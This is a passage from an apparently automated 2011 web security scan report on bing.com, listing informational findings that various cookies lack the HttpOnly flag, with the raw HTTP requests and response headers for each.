Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 749f07315b7f481d9bcac535c037827d
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001205
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_UserLocation=Colorado Springs, CO; path=/local
Set-Cookie: VE_UserLatLong=38.83310995996,-104.821729436517; path=/local
Set-Cookie: VE_LSV=cache=0; path=/local/us/co/colorado%20springs
Content-Length: 26370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

3.17. http://www.bing.com/local/us/dc/washington/restaurants/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/us/dc/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 12 Feb 2011 00:37:59 GMT
Last-Modified: Fri, 11 Feb 2011 22:37:59 GMT
X-BM-TraceID: a58b304d7fbc4d6ca32567cddb61ef32
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001204
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:37:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/dc/washington/restaurants
Content-Length: 81374


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

3.18. http://www.bing.com/local/ypdefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/ypdefault.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/ypdefault.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 23:45:17 GMT
Last-Modified: Fri, 11 Feb 2011 21:45:17 GMT
X-BM-TraceID: 5c0f1f0c56bc48fb8aa37c02cfb76fa8
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BID=105e87fa5505430dba31d5b25b248b42; path=/local
Set-Cookie: CID=84ab2256db4b4410ac7cbfab5b9a7934; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=2/11/2011 9:45:17 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:17 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=63F5F83330384CD78E309DFEE65F3927; domain=.bing.com; path=/
Content-Length: 55438


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.live
...[SNIP]...

3.19. http://www.bing.com/maps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 1a0e5b1d2d614a5a8935caa2c2a373d3
X-Ve-Server: BL2-01206-20110127.750-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001206
Date: Fri, 11 Feb 2011 21:44:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:28 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=8E0811106C0646379A276C208363964B; domain=.bing.com; path=/
Content-Length: 116852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

3.20. http://www.bing.com/maps/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/default.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: c821dd5956474cc8a14cb3f28f6175f4
X-Ve-Server: BL2-01212-20110127.750-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Date: Fri, 11 Feb 2011 21:44:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:50 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C6FB3C601612431EA0824421BAC3CD04; domain=.bing.com; path=/
Content-Length: 116900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

3.21. http://www.bing.com/maps/explore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/explore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/explore/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Ve-Server: 01208
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: slpreview=1; path=/maps
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:13 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=ECF2B380802E49969DD2EADFA4502597; domain=.bing.com; path=/
Content-Length: 43179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/
...[SNIP]...

3.22. http://www.bing.com/news/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:44:27 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:27 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460667; domain=.bing.com; path=/
Set-Cookie: _SS=SID=29DA2FA1DA7F4552877E610D60E8B949; domain=.bing.com; path=/


3.23. http://www.bing.com/news/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:44:27 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:27 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460667; domain=.bing.com; path=/
Set-Cookie: _SS=SID=5112D7B54309486995D17B4B2D97CE76; domain=.bing.com; path=/


3.24. http://www.bing.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /results.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:43:50 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1297460630; domain=.bing.com; path=/


3.25. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:47 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:47 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460807; domain=.bing.com; path=/
Set-Cookie: _SS=SID=39C40F774DB04C78BCC469B988D1944B; domain=.bing.com; path=/
Content-Length: 0


3.26. http://www.bing.com/settings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /settings.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /settings.aspx?pref_sbmt=1&ru=http%3A%2F%2Fwww.bing.com%3A80%2Flocal%2F&adlt_set=demote&geoname=Washington%2C+District+Of+Columbia&geonamedef=Washington%2C+District+Of+Columbia&setplang=NO_OP&rpp=10&enAS=1&langall=1&sl=37&GUID=DC63BAA44C3843F38378B4BB213E0A6F&uid=3874D123 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/settings.aspx?ru=http%3a%2f%2fwww.bing.com%3a80%2flocal%2f&FORM=SEFD1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com:80/local/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 23:28:20 GMT
Connection: close
Set-Cookie: SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; expires=Sun, 10-Feb-2013 23:28:19 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297466900; domain=.bing.com; path=/


3.27. http://www.bing.com/shopping  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:46:34 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:35 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=A2A898C7201E474486150618933AB2DB; domain=.bing.com; path=/
Content-Length: 90390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

3.28. http://www.bing.com/shopping/binoculars/c/4378  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/binoculars/c/4378

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping/binoculars/c/4378 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:33 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:34 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=6FA303C0EC0A468CBC9A123EAF0F8F57; domain=.bing.com; path=/
Content-Length: 89844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

3.29. http://www.bing.com/shopping/classic-womens-fragrances/r/162  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/classic-womens-fragrances/r/162

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping/classic-womens-fragrances/r/162 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:26 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:27 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C0C28A6164ED41C38DC21B95216F1854; domain=.bing.com; path=/
Content-Length: 53787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

3.30. http://www.bing.com/shopping/pet-litter-supplies/c/6874  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/pet-litter-supplies/c/6874

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping/pet-litter-supplies/c/6874 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:58 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:59 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=55C1E3103C224B9EAF396B98665F1BA5; domain=.bing.com; path=/
Content-Length: 76539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

3.31. http://www.bing.com/travel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.bing.com/travel/
Date: Fri, 11 Feb 2011 21:46:56 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:55 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460815; domain=.bing.com; path=/
Set-Cookie: _SS=SID=130927E42C87488A80B3458098DA4E9D; domain=.bing.com; path=/


3.32. http://www.bing.com/videos/browse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/browse

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/browse HTTP/1.1
Host: www.bing.com
Accept: */*
